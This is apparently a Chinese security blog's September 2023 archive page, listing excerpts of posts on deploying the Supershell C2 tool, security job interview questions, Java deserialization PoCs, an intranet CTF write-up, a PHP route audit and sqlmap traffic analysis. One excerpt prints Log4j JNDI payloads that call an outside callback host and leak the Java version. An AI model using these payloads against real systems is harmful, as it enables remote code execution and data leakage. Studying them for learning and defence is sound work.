09 2023 档案
摘要:今天搭建了一下supershell,蛮好用的,推荐一手。 GITHUB地址:https://github.com/tdragon6/Supershell 部署 首先必须要先有一台自己的公网服务器,可以考虑阿里云,腾讯云,华为云,百度云之类的。 然后就开始搭建! 输入命令行,下载解压源码 wget h
阅读全文
摘要:蛮简单的,拿下offer 中电安科一面 这是一家偏向工控的安全公司 自我介绍 web比较熟的漏洞有哪些?最熟的是哪个? 文件上传呢? 反序列化漏洞了解过吗? 提权接触过吗? 协议通信了解过吗? 你对工控安全有了解吗? 对病毒有多什么研究吗? 可以介绍一下XSS吗? 拒绝服务攻击和分布式拒绝服务攻击有
阅读全文
摘要:360安全研究一面 ps:中间一半的时候才开始录的,整理了一下后半段的面试问题。中间一半的时候才开始录的,整理了一下后半段的面试问题。 自我介绍 sqlmap针对时间盲注该用什么参数? MSF使用上的流程? 你经常用MSF的用来做什么? 内网里不出网,如何搭建隧道? 如果说内网里拿到层层主机,如何配
阅读全文
摘要:更新一下笔记中JAVA的几个知名的反序列化漏洞,仅漏洞poc和原理,无分析过程。 Log4j 条件:出网(因为需要请求jndi服务器) ${jndi:ldap://yuvs2b.ceye.io} //外带请求 ${jndi:ldap://${java:version}.f2478a5a.ipv6.1
阅读全文
摘要:本文作者幽壑,本文属于i春秋原创激励计划,欢迎师傅们标明出处转载,一同交流。 https://bbs.ichunqiu.com/thread-63574-1-1.html 国护夜班实在太无聊了,半夜燥热,客户还偷偷藏我们项目经理买的零食,哎,浅浅摸个鱼 打个ctfshow内网靶场。 记一次步履艰辛的
阅读全文
摘要:本篇文章作者幽壑,本文属i春秋原创奖励计划,未经许可禁止转载。 https://bbs.ichunqiu.com/thread-63544-1-1.html 记一次PHP路由审计 工具:Seay源代码审计系统 0x1 反射型xss 首先进行一个自动化扫描,根据结果进行跟进排查 跟进/user/tpl
阅读全文
摘要:本篇文章作者幽壑,本文属i春秋原创奖励计划,未经许可禁止转载。 https://bbs.ichunqiu.com/thread-63533-1-1.html SQLMAP流量特征分析 配置环境 测试靶场:pikachu 测试环境:PHP5.4、Apache 2.0、MYSQL5.0.10 测试工具:
阅读全文